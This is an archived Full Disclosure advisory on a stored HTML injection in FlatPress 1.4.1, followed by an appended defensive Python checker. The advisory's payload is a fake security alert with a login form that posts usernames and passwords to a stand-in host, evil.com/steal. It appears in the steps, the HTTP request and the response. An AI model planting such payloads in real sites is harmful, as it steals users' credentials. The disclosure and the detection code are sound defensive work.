Stored HTML Injection - flatpressv1.4.1
FlatPress v1.4.1 contains a Stored HTML Injection vulnerability that allows an attacker to inject malicious HTML code that displays a fake warning box in the page and collects user credentials. 2025-9-23 03:35:12 Author: seclists.org


Full Disclosure mailing list archives


From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 21 Sep 2025 17:31:27 +0100

# Exploit Title: Stored HTML Injection - flatpressv1.4.1
# Date: 09/2025
# Exploit Author: Andrey Stoykov
# Version: 1.4.1
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/09/friday-fun-pentest-series-41-stored.html


Stored HTML Injection:

Steps to Reproduce:

- Log in as the admin user, visit "Main" > "New Entry" > "Write Entry" and
in the description enter the payload "[html]<div style="border:2px solid
red;padding:20px;margin:20px;background:yellow"><h2>SECURITY
ALERT</h2><p>Your account has been compromised. Please login
again:</p><form action="https://evil.com/steal";><input type="text"
placeholder="Username"><input type="password"
placeholder="Password"><button>Login</button></form></div>[/html]"


// HTTP POST Request

POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1
Host: demos5.softaculous.com
Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0)
Gecko/20100101 Firefox/144.0
[...]

_wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi&timestamp=1758471158&entry=&attachselect=--
Selection --&imageselect=-- Selection --&content=[html]<div
style="border:2px solid
red;padding:20px;margin:20px;background:yellow"><h2>SECURITY
ALERT</h2><p>Your account has been compromised. Please login
again:</p><form action="https://evil.com/steal";><input type="text"
placeholder="Username"><input type="password"
placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish


// HTTP Response

HTTP/1.1 302 Found
Date: Sun, 21 Sep 2025 16:12:55 GMT
Server: FlatPress
[...]


// HTTP GET Request

GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1
Host: demos5.softaculous.com
Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0)
Gecko/20100101 Firefox/144.0
[...]


// HTTP Response

HTTP/1.1 200 OK
Date: Sun, 21 Sep 2025 16:12:58 GMT
Server: FlatPress
[...]

[...]
<div itemprop="articleBody"><p><div style="border:2px solid
red;padding:20px;margin:20px;background:yellow"><h2>SECURITY
ALERT</h2><p>Your account has been compromised. Please login
again:</p><form action="https://evil.com/steal";><input type="text"
placeholder="Username"><input type="password"
placeholder="Password"><button>Login</button></form></div></p></div>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
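As an added defensive example, not part of the advisory or of FlatPress itself, the following Python check parses an admin.php POST body like the one above, flags form and script-type elements inside the [html]...[/html] blocks of the content field, and shows a minimal strip of those elements. The sample body is reconstructed from the request above with the line wrapping removed; the deny list and the small form-body parser are this example's assumptions.

```python
import re
from urllib.parse import unquote_plus

# Elements an entry body has no legitimate use for (the phishing box needs
# form/input/button). This deny list is this example's assumption, not FlatPress's.
DISALLOWED_TAGS = {"form", "input", "button", "select", "textarea",
                   "script", "iframe", "object", "embed", "meta", "base"}

# The advisory's payload wraps its markup in [html]...[/html]; checks are scoped to those blocks.
HTML_BLOCK = re.compile(r"\[html\](.*?)\[/html\]", re.IGNORECASE | re.DOTALL)
TAG_NAME = re.compile(r"<\s*/?\s*([A-Za-z][A-Za-z0-9]*)")
DISALLOWED_TAG = re.compile(r"<\s*/?\s*(?:" + "|".join(sorted(DISALLOWED_TAGS))
                            + r")\b[^>]*>", re.IGNORECASE)

# Constructed sample: the admin.php POST body from the advisory, unwrapped and
# trimmed to the fields that matter here.
SAMPLE_BODY = (
    "_wpnonce=ee76fd6c94&subject=HTMLi&entry=&content=[html]"
    '<div style="border:2px solid red;background:yellow"><h2>SECURITY ALERT'
    "</h2><p>Your account has been compromised. Please login again:</p>"
    '<form action="https://evil.com/steal"><input type="text" '
    'placeholder="Username"><input type="password" placeholder="Password">'
    "<button>Login</button></form></div>[/html]&save=Publish"
)

def form_field(body, name):
    """Value of one field in an application/x-www-form-urlencoded body
    (split on '&' only, so ';' inside inline CSS is not a separator)."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    return ""

def inspect_post_body(body):
    """Sorted names of disallowed elements used inside the [html] blocks of
    the 'content' field; an empty list means nothing to flag."""
    found = set()
    for block in HTML_BLOCK.findall(form_field(body, "content")):
        found |= {t.lower() for t in TAG_NAME.findall(block)} & DISALLOWED_TAGS
    return sorted(found)

def strip_disallowed(content):
    """Drop disallowed tags (open and close) from each [html] block, keeping
    the text between them. Attributes on allowed elements are not inspected,
    so treat this as containment, not a complete sanitizer."""
    return HTML_BLOCK.sub(
        lambda m: "[html]" + DISALLOWED_TAG.sub("", m.group(1)) + "[/html]",
        content)
```

The same check can be run over already stored entry bodies to find posts that carry such blocks.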



Article source: https://seclists.org/fulldisclosure/2025/Sep/63